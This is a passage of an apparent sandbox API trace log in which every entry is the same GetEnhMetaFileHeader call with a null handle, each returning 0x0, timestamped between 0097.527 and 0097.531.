nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.527] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.527] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.527] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.527] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.527] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.527] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.527] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.527] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.527] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.527] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.527] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.527] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.527] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.527] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.527] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: 
lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.528] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.528] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.528] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.528] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.528] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.528] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.528] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.528] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.528] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.528] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.528] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.528] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.528] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.528] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.528] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.528] 
GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.528] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.528] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.528] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.528] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.528] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.528] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.528] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.528] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.528] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.528] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.528] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.528] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.528] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.528] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.528] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, 
lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.528] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.528] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.528] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.528] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.528] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.528] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.528] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.528] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.528] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.528] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.528] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.529] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.529] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.529] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.529] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) 
returned 0x0 [0097.529] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.529] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.529] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.529] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.529] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.529] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.529] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.529] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.529] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.529] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.529] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.529] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.529] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.529] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.529] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.529] GetEnhMetaFileHeader (in: hemf=0x0, 
nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.529] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.529] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.529] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.529] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.529] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.529] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.529] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.529] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.529] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.529] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.529] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.529] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.529] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.529] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.529] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: 
lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.529] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.529] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.529] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.529] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.529] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.529] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.529] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.529] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.529] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.529] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.530] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.530] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.530] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.530] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.530] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.530] 
GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.530] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.530] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.530] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.530] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.530] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.530] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.530] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.530] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.530] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.530] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.530] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.530] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.530] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.530] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.530] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, 
lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.530] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.530] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.530] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.530] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.530] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.530] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.530] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.530] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.530] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.530] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.530] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.530] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.530] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.530] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.530] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) 
returned 0x0 [0097.530] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.530] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.530] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.530] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.530] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.530] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.530] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.531] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.531] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.531] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.531] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.531] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.531] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.531] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.531] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.531] GetEnhMetaFileHeader (in: hemf=0x0, 
nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.531] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.531] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.531] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.531] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.531] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.531] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.531] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.531] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.531] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.531] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.531] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.531] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.531] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.531] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.531] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: 
